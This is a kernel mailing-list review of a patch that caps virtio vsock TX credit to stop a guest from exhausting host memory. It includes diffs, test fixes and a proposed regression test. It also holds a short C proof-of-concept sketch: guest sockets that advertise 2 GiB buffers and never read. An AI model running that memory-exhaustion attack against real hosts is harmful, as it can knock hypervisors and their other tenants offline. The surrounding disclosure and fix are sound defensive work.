Message-ID: <CAGxU2F6TMP7tOo=DONL9CJUW921NXyx9T65y_Ai5pbzh1LAQaA@mail.gmail.com>
Date: Thu, 11 Dec 2025 11:08:21 +0100
From: Stefano Garzarella <sgarzare@...hat.com>
To: Melbin K Mathew <mlbnkm1@...il.com>
Cc: stefanha@...hat.com, kvm@...r.kernel.org, netdev@...r.kernel.org,
virtualization@...ts.linux.dev, linux-kernel@...r.kernel.org, mst@...hat.com,
jasowang@...hat.com, xuanzhuo@...ux.alibaba.com, eperezma@...hat.com,
davem@...emloft.net, edumazet@...gle.com, kuba@...nel.org, pabeni@...hat.com,
horms@...nel.org
Subject: Re: [PATCH] vsock/virtio: cap TX credit to local buffer size
On Thu, 11 Dec 2025 at 10:10, Stefano Garzarella <sgarzare@...hat.com> wrote:
>
> On Wed, Dec 10, 2025 at 04:00:19PM +0100, Melbin K Mathew wrote:
> >The virtio vsock transport currently derives its TX credit directly
> >from peer_buf_alloc, which is set from the remote endpoint's
> >SO_VM_SOCKETS_BUFFER_SIZE value.
>
> Why did you remove the target tree [net] from the tags?
>
> Also, this is a v2, so the tag should have been [PATCH net v2]; please
> check this in future versions. More info:
>
> https://www.kernel.org/doc/html/latest/process/submitting-patches.html#subject-line
>
> >
> >On the host side this means that the amount of data we are willing to
> >queue for a connection is scaled by a guest-chosen buffer size,
> >rather than the host's own vsock configuration. A malicious guest can
> >advertise a large buffer and read slowly, causing the host to allocate
> >a correspondingly large amount of sk_buff memory.
> >
> >Introduce a small helper, virtio_transport_tx_buf_alloc(), that
> >returns min(peer_buf_alloc, buf_alloc), and use it wherever we consume
> >peer_buf_alloc:
> >
> > - virtio_transport_get_credit()
> > - virtio_transport_has_space()
> > - virtio_transport_seqpacket_enqueue()
> >
> >This ensures the effective TX window is bounded by both the peer's
> >advertised buffer and our own buf_alloc (already clamped to
> >buffer_max_size via SO_VM_SOCKETS_BUFFER_MAX_SIZE), so a remote guest
> >cannot force the host to queue more data than allowed by the host's
> >own vsock settings.
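To make this concrete (rough numbers, assuming the default 256 KiB buffer
size on the host sender side), the credit computation changes roughly like
this:

	/* before: bounded only by the guest-chosen value, up to ~2 GiB here */
	ret = vvs->peer_buf_alloc - (vvs->tx_cnt - vvs->peer_fwd_cnt);

	/* after: also bounded by our own configuration, i.e. <= ~256 KiB */
	ret = min(vvs->peer_buf_alloc, vvs->buf_alloc) -
	      (vvs->tx_cnt - vvs->peer_fwd_cnt);

so with 32 such connections the host queues at most a few MiB instead of
tens of GiB.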
> >
> >On an unpatched Ubuntu 22.04 host (~64 GiB RAM), running a PoC with
> >32 guest vsock connections advertising 2 GiB each and reading slowly
> >drove Slab/SUnreclaim from ~0.5 GiB to ~57 GiB, and the system only
> >recovered after killing the QEMU process.
> >
> >With this patch applied, rerunning the same PoC yields:
> >
> > Before:
> > MemFree: ~61.6 GiB
> > MemAvailable: ~62.3 GiB
> > Slab: ~142 MiB
> > SUnreclaim: ~117 MiB
> >
> > After 32 high-credit connections:
> > MemFree: ~61.5 GiB
> > MemAvailable: ~62.3 GiB
> > Slab: ~178 MiB
> > SUnreclaim: ~152 MiB
> >
> >i.e. only ~35 MiB increase in Slab/SUnreclaim, no host OOM, and the
> >guest remains responsive.
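The guest side of such a PoC is essentially just a handful of sockets
advertising a huge receive buffer and then never reading; untested sketch,
error handling omitted, port and connection count made up (the host side
only has to keep write()ing into each accepted connection):

	#include <unistd.h>
	#include <sys/socket.h>
	#include <linux/vm_sockets.h>

	#define N_CONN	32
	#define PORT	1234

	int main(void)
	{
		unsigned long long buf = 2ULL * 1024 * 1024 * 1024; /* 2 GiB */
		struct sockaddr_vm addr = {
			.svm_family = AF_VSOCK,
			.svm_cid = VMADDR_CID_HOST,
			.svm_port = PORT,
		};

		for (int i = 0; i < N_CONN; i++) {
			int fd = socket(AF_VSOCK, SOCK_STREAM, 0);

			/* advertise a huge receive buffer to the host */
			setsockopt(fd, AF_VSOCK, SO_VM_SOCKETS_BUFFER_MAX_SIZE,
				   &buf, sizeof(buf));
			setsockopt(fd, AF_VSOCK, SO_VM_SOCKETS_BUFFER_SIZE,
				   &buf, sizeof(buf));

			connect(fd, (struct sockaddr *)&addr, sizeof(addr));
			/* ...and then never (or only very slowly) read from fd */
		}

		pause();	/* keep the connections open */
		return 0;
	}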
>
> I think we should include here a summary of what you replied to Michael
> about other transports.
>
> I can't find your reply in the archive, but I mean the reply to
> https://lore.kernel.org/netdev/20251210084318-mutt-send-email-mst@kernel.org/
>
> >
> >Fixes: 06a8fc78367d ("VSOCK: Introduce virtio_vsock_common.ko")
> >Suggested-by: Stefano Garzarella <sgarzare@...hat.com>
> >Signed-off-by: Melbin K Mathew <mlbnkm1@...il.com>
> >---
> > net/vmw_vsock/virtio_transport_common.c | 27 ++++++++++++++++++++++---
> > 1 file changed, 24 insertions(+), 3 deletions(-)
> >
> >diff --git a/net/vmw_vsock/virtio_transport_common.c b/net/vmw_vsock/virtio_transport_common.c
> >index dcc8a1d58..02eeb96dd 100644
> >--- a/net/vmw_vsock/virtio_transport_common.c
> >+++ b/net/vmw_vsock/virtio_transport_common.c
> >@@ -491,6 +491,25 @@ void virtio_transport_consume_skb_sent(struct sk_buff *skb, bool consume)
> > }
> > EXPORT_SYMBOL_GPL(virtio_transport_consume_skb_sent);
> >
> >+/*
> >+ * Return the effective peer buffer size for TX credit computation.
>
> nit: block comments in this file don't leave an empty first line, so I'd
> follow that style:
>
> @@ -491,8 +491,7 @@ void virtio_transport_consume_skb_sent(struct sk_buff *skb, bool consume)
> }
> EXPORT_SYMBOL_GPL(virtio_transport_consume_skb_sent);
>
> -/*
> - * Return the effective peer buffer size for TX credit computation.
> +/* Return the effective peer buffer size for TX credit computation.
> *
> * The peer advertises its receive buffer via peer_buf_alloc, but we
> * cap that to our local buf_alloc (derived from
>
> >+ *
> >+ * The peer advertises its receive buffer via peer_buf_alloc, but we
> >+ * cap that to our local buf_alloc (derived from
> >+ * SO_VM_SOCKETS_BUFFER_SIZE and already clamped to buffer_max_size)
> >+ * so that a remote endpoint cannot force us to queue more data than
> >+ * our own configuration allows.
> >+ */
> >+static u32 virtio_transport_tx_buf_alloc(struct virtio_vsock_sock *vvs)
> >+{
> >+ u32 peer = vvs->peer_buf_alloc;
> >+ u32 local = vvs->buf_alloc;
> >+
> >+ if (peer > local)
> >+ return local;
> >+ return peer;
> >+}
> >+
>
> I think here Michael was suggesting this:
>
> @@ -502,12 +502,7 @@ EXPORT_SYMBOL_GPL(virtio_transport_consume_skb_sent);
> */
> static u32 virtio_transport_tx_buf_alloc(struct virtio_vsock_sock *vvs)
> {
> - u32 peer = vvs->peer_buf_alloc;
> - u32 local = vvs->buf_alloc;
> -
> - if (peer > local)
> - return local;
> - return peer;
> + return min(vvs->peer_buf_alloc, vvs->buf_alloc);
> }
>
>
> > u32 virtio_transport_get_credit(struct virtio_vsock_sock *vvs, u32 credit)
> > {
> > u32 ret;
> >@@ -499,7 +518,8 @@ u32 virtio_transport_get_credit(struct virtio_vsock_sock *vvs, u32 credit)
> > return 0;
> >
> > spin_lock_bh(&vvs->tx_lock);
> >- ret = vvs->peer_buf_alloc - (vvs->tx_cnt - vvs->peer_fwd_cnt);
> >+ ret = virtio_transport_tx_buf_alloc(vvs) -
> >+ (vvs->tx_cnt - vvs->peer_fwd_cnt);
> > if (ret > credit)
> > ret = credit;
> > vvs->tx_cnt += ret;
> >@@ -831,7 +851,7 @@ virtio_transport_seqpacket_enqueue(struct vsock_sock *vsk,
> >
> > spin_lock_bh(&vvs->tx_lock);
> >
> >- if (len > vvs->peer_buf_alloc) {
> >+ if (len > virtio_transport_tx_buf_alloc(vvs)) {
> > spin_unlock_bh(&vvs->tx_lock);
> > return -EMSGSIZE;
> > }
> >@@ -882,7 +902,8 @@ static s64 virtio_transport_has_space(struct vsock_sock *vsk)
> > struct virtio_vsock_sock *vvs = vsk->trans;
> > s64 bytes;
> >
> >- bytes = (s64)vvs->peer_buf_alloc - (vvs->tx_cnt - vvs->peer_fwd_cnt);
> >+ bytes = (s64)virtio_transport_tx_buf_alloc(vvs) -
> >+ (vvs->tx_cnt - vvs->peer_fwd_cnt);
>
> nit: please align this:
>
> @@ -903,7 +898,7 @@ static s64 virtio_transport_has_space(struct vsock_sock *vsk)
> s64 bytes;
>
> bytes = (s64)virtio_transport_tx_buf_alloc(vvs) -
> - (vvs->tx_cnt - vvs->peer_fwd_cnt);
> + (vvs->tx_cnt - vvs->peer_fwd_cnt);
> if (bytes < 0)
> bytes = 0;
>
>
> Just minor things, but the patch LGTM, thanks!
I just noticed that vsock_test is now failing, because one peer (the client)
tries to send more than the TX buffer size while the receiver is waiting for
the whole data.

This should fix the test:

From b69ca1fd3d544345b02cedfbeb362493950a87c1 Mon Sep 17 00:00:00 2001
From: Stefano Garzarella <sgarzare@...hat.com>
Date: Thu, 11 Dec 2025 10:55:06 +0100
Subject: [PATCH 1/1] vsock/test: fix seqpacket message bounds test
The test requires the sender (client) to send all messages before waking
up the receiver (server).

This test used to work because virtio-vsock had a bug and did not respect
the TX buffer size; now that the bug is fixed, the test hangs because the
sender fills its TX buffer before waking up the receiver.

Set the buffer size in the sender (client) as well, as we already do for
the receiver (server).
Fixes: 5c338112e48a ("test/vsock: rework message bounds test")
Signed-off-by: Stefano Garzarella <sgarzare@...hat.com>
---
tools/testing/vsock/vsock_test.c | 11 +++++++++++
1 file changed, 11 insertions(+)
diff --git a/tools/testing/vsock/vsock_test.c b/tools/testing/vsock/vsock_test.c
index 9e1250790f33..af6665ed19d5 100644
--- a/tools/testing/vsock/vsock_test.c
+++ b/tools/testing/vsock/vsock_test.c
@@ -351,6 +351,7 @@ static void test_stream_msg_peek_server(const struct test_opts *opts)
static void test_seqpacket_msg_bounds_client(const struct test_opts *opts)
{
+ unsigned long long sock_buf_size;
unsigned long curr_hash;
size_t max_msg_size;
int page_size;
@@ -363,6 +364,16 @@ static void test_seqpacket_msg_bounds_client(const struct test_opts *opts)
exit(EXIT_FAILURE);
}
+ sock_buf_size = SOCK_BUF_SIZE;
+
+ setsockopt_ull_check(fd, AF_VSOCK, SO_VM_SOCKETS_BUFFER_MAX_SIZE,
+ sock_buf_size,
+ "setsockopt(SO_VM_SOCKETS_BUFFER_MAX_SIZE)");
+
+ setsockopt_ull_check(fd, AF_VSOCK, SO_VM_SOCKETS_BUFFER_SIZE,
+ sock_buf_size,
+ "setsockopt(SO_VM_SOCKETS_BUFFER_SIZE)");
+
/* Wait, until receiver sets buffer size. */
control_expectln("SRVREADY");
--
2.52.0

Please send a series (e.g. v3) that includes both your patch and this fix
for the test.
Maybe we can also add a new test that exercises exactly the problem you're
fixing, to avoid regressions.
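Something very roughly like this could work for the stream case (untested
sketch, reusing the existing helpers in vsock_test.c; the server counterpart
would set a large buffer, reply "SRVREADY" and then wait for "CLIDONE"
without reading; the exact bound may need some slack):

	static void test_stream_credit_cap_client(const struct test_opts *opts)
	{
		unsigned long long sock_buf_size = 64 * 1024; /* our own, small */
		size_t total = 0;
		char buf[4096] = { 0 };
		int fd;

		fd = vsock_stream_connect(opts->peer_cid, opts->peer_port);
		if (fd < 0) {
			perror("connect");
			exit(EXIT_FAILURE);
		}

		setsockopt_ull_check(fd, AF_VSOCK, SO_VM_SOCKETS_BUFFER_MAX_SIZE,
				     sock_buf_size,
				     "setsockopt(SO_VM_SOCKETS_BUFFER_MAX_SIZE)");
		setsockopt_ull_check(fd, AF_VSOCK, SO_VM_SOCKETS_BUFFER_SIZE,
				     sock_buf_size,
				     "setsockopt(SO_VM_SOCKETS_BUFFER_SIZE)");

		/* wait until the peer has advertised its (large) buffer */
		control_expectln("SRVREADY");

		/* Non-blocking sends: with the fix we must hit EAGAIN once our
		 * own buf_alloc is used up, long before the peer's advertised
		 * buffer would be full.
		 */
		fcntl(fd, F_SETFL, O_NONBLOCK);
		for (;;) {
			ssize_t ret = send(fd, buf, sizeof(buf), 0);

			if (ret < 0 && errno == EAGAIN)
				break;
			if (ret < 0) {
				perror("send");
				exit(EXIT_FAILURE);
			}
			total += ret;
		}

		if (total > sock_buf_size) {
			fprintf(stderr, "sent %zu bytes, expected <= %llu\n",
				total, sock_buf_size);
			exit(EXIT_FAILURE);
		}

		control_writeln("CLIDONE");
		close(fd);
	}

Just a rough idea, of course; we can refine it in the next version.
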
Thanks,
Stefano